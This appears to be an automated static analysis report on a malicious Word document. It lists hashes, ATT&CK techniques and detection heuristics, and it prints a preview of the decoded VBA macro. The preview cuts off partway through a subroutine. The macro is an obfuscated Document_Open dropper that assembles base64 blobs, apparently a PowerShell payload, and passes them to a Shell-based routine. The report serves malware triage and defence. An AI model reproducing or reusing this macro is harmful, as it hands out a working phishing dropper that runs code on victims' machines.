Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1909d3e891e93a3…

MALICIOUS

Office (OLE)

Size: 113.0 KB
Created: 2018-07-27 20:36:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: a896d7f1b3b020eee5b121f1aea9f38e
SHA-1: 63a8cdaf9865da0d31c802cf369ba543a9febfe3
SHA-256: f1909d3e891e93a39838f96c576942a89f5da6b0395aa8b512933b7851e706e6
Risk Score: 184

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample is a Word document containing VBA macros, specifically a Document_Open macro that calls the Shell() function, which indicates an attempt to execute arbitrary code as soon as the document is opened. The document body explicitly prompts the user to "Enable Content", a common social-engineering tactic to bypass macro security. The VBA code appears to be obfuscated, but the presence of Shell() together with the lure strongly suggests it is designed to download and execute a second-stage payload.

Heuristics (7)

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure (medium) SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.day.com/dam/1.0 (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19342 bytes
SHA-256: 69bea706a52c61f360ed3e505324ef0cd76ef2317137b7d6a68c41291b0d7ee0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
If 49 < 175 Then
' WAPUCu
Else
' ww0t5xznT
MsgBox "I9uxK6"
End If
If 883 - 16 = 25656 / 4276 Then
tWtyPx = "ih3bVoSB"
End If
Ujnflh = "BYvfj"
boLSU = tWtyPx & Ujnflh
yaZBUDfQ = "1Wc1VTdFNURWx0UW1SdGNuSmlOVUpKY1doblVWUjFkMDVyUnpKb1dHcFZZVVJRVEdzclEyeGxNekU0TWpOa1oyMVpRelpNVFZoSWEybDBRM1kyT1hSNVRtMW1VVUZsVmpjMk1FWkpiRk5hYm05bk1taERkRVYwT0hKNU56ZEJPRXMwTVcxM2IybG9ZWEZLVlU1TFNuaHFNSEEzZVVWQlRucFpXR0oyZWxjMVdrWnFabnBQT0c5eE1USm9UVFpaVW0xWFdUZ3JPWE5yZG10cU0yRXhhbEpYTjBvMU1FRXJUVVlyTjBGV1pXMHdUMkZVV1dobU4zbE5"
r85Ruc = "WbmxuT0ZSMFptVlRaMnBvWml0RU1XRkVkbmxSVVhGVmNXZ3JSMGd5TDBWaGMyWTRRVUZCUVNjcEtUc2dTVVZZSUNoT1pYY3RUMkpxWldOMElFbFBMbE4w"
Wy7rAvlTf = "Y21WaGJWSm"
Dim ei6Co
ei6Co = 27
While ei6Co < 515
ei6Co = ei6Co + 29
Wend
Ob3fOPNK9 = "cZwah6"
hXYUNiC8h = UnMmjfo & ei6Co
If 33 < 246 Then
' ZfnqYmM
Else
' ijg9GUyPO
MsgBox "j7Len"
End If
Dim DOdJw
DOdJw = 15
While DOdJw <= 367
DOdJw = DOdJw + 39
Wend
bBPQln = 6300
eG6i8 = HoD4Hu & DOdJw
Dim Rs7i4
Rs7i4 = yaZBUDfQ & r85Ruc & Wy7rAvlTf
bj9qMt = "xZV1JsY2loT1pYY3RUMkpxWldOMElFbFBMa052YlhCeVpYTnphVzl1TGtkNmFYQlRkSEpsWVcwb0pITXNXMGxQTGtOdmJY"
eoYIs = "QnlaWE56YVc5dUxrTnZiWEJ5WlhOemFXOXVUVzlrWlYwNk9rUmxZMjl0Y0hKbGMzTXBLU2t1VW1WaFpGUnZSVzVrS0NrNw=="
If 8 < 206 Then
' YkN6mL7
Else
' rvkBQ
MsgBox "US0Hi3z"
End If
If 22464 / 26 = 28130 / 5626 Then
eLDgA3t = "JChkAbngF"
End If
WoPDk = 23941
zEaih = eLDgA3t & WoPDk
Dim SiMtD
SiMtD = bj9qMt & eoYIs
TG2Zxc = "Y0c5M1pYSnphR1ZzYkNBa2N6MU9aWGN0VDJKcVpXTjBJRWxQTGsxbGJXOXllVk4wY21WaGJTZ3NXME52Ym5abGNuUmRPanBHY205dFFtRnpaVFkwVTNSeWFXNW5LQ2RJTkhOSlFVRkJRVUZCUVVGQk1GaFBVVlYyUkUxQ2FrYzRZU3RUVVhsRmRHSnRhMjV"
S81geDz = "4SzB4RFJVcDNTVXQxYVdkMWJESTRjRTV0TjBwaE5VeFJka3AxWWxOcU9UZDJXV2RsYmpjck9GQjVVelUzUW"
Dim j6ytS
j6ytS = 151
While j6ytS <= 274
j6ytS = j6ytS + 42
Wend
AwHabYjv = "KaS9zFM"
ujYNSv3hU = u62GYzTgt & j6ytS
Dim EShdX
EShdX = TG2Zxc & S81geDz
If 61 < 163 Then
' we0UStT
Else
' iqyRw
MsgBox "Mot70l8"
End If
Dim Tr1GHfmj
Tr1GHfmj = 252
While Tr1GHfmj <= 611
Tr1GHfmj = Tr1GHfmj + 41
Wend
ZTBYgb = 61960
j3uniCVD7 = EqaIKEOf1 & Tr1GHfmj
KZqmVIae = EShdX & Rs7i4 & SiMtD
If 20 < 128 Then
' gWP7w
Else
' QX2GbzRWQ
MsgBox "hwQRiK2ud"
End If
If 20 < 128 Then
' QKSMQ93wF
Else
' uDI4tBLJ
MsgBox "qDFcapCu"
End If
If 57 < 232 Then
' yQpuDW
Else
' FHMU2Wdu8
Debug.Print "XaJH4QpwC"
End If
If 996 + 8 = -141 + 148 Then
wYaAyhbtW = "ij97FXZ"
End If
GBHQCqbn = 14514
gmJWnsVfR = wYaAyhbtW & GBHQCqbn
If 20930 / 91 = 24724 / 3532 Then
CZz4nqGO = "DkiVmYTAv"
End If
GIvjL0Kc = "F3Yh8KrDi"
fT5FGqXSf = CZz4nqGO & GIvjL0Kc
Dim YrSbMwgBk
YrSbMwgBk = 82
While YrSbMwgBk <= 772
YrSbMwgBk = YrSbMwgBk + 30
Wend
A73k8h = 25755
MXtyNeCOQ = Jkdvl & YrSbMwgBk
Call Stalin(KZqmVIae)
End Sub

Attribute VB_Name = "qVnlqz"
Sub Stalin(p23Y5F)
If 13 < 149 Then
' uHwap2Acd
Else
' fh1IN8
MsgBox "nqOwS4ZV"
End If
Dim TfhoE
TfhoE = 60
While TfhoE < 803
TfhoE = TfhoE + 32
Wend
dc6zOs = "ZEVhzrT4Y"
NmjGdXb = XYm4eZ & TfhoE
If 12121 / 17 = -375 + 390 Then
QY0JOMl = "FHychL"
End If
fPs7evjQ = 9273
do1PN50JM = QY0JOMl & fPs7evjQ
If 46 < 187 Then
' mHtsLax
Else
' t9xAPOVY
Debug.Print "S8Bijr"
End If
If 19 < 162 Then
' VxAfKm
Else
' Cwt1Z4UMk
Debug.Print "RZOR6"
End If
Dim qagwUSe
qagwUSe = 90
While qagwUSe <= 816
qagwUSe = qagwUSe + 62
Wend
sQgDVcYHX = "tnlv71"
OUTtKo4 = Vh2IO & qagwUSe
Dim uauOH
uauOH = 141
While uauOH < 692
uauOH = uauOH + 56
Wend
hJPIueOB = "uJ5dmyFZ"
F1WNFvAEC = cAL8Xv & uauOH
Dim QMrwRpqeF
QMrwRpqeF = 141
While QMrwRpqeF < 692
QMrwRpqeF = QMrwRpqeF + 56
Wend
muxEbva = "xETI451"
b9yd5N = Q1amHCV4 & QMrwRpqeF
Dim bNoOrVY4
bNoOrVY4 = 245
While bNoOrVY4 <= 461
bNoOrVY4 = bNoOrVY4 + 59
Wend
IiA8OeG = "eTba5xOZl"
C
... (truncated)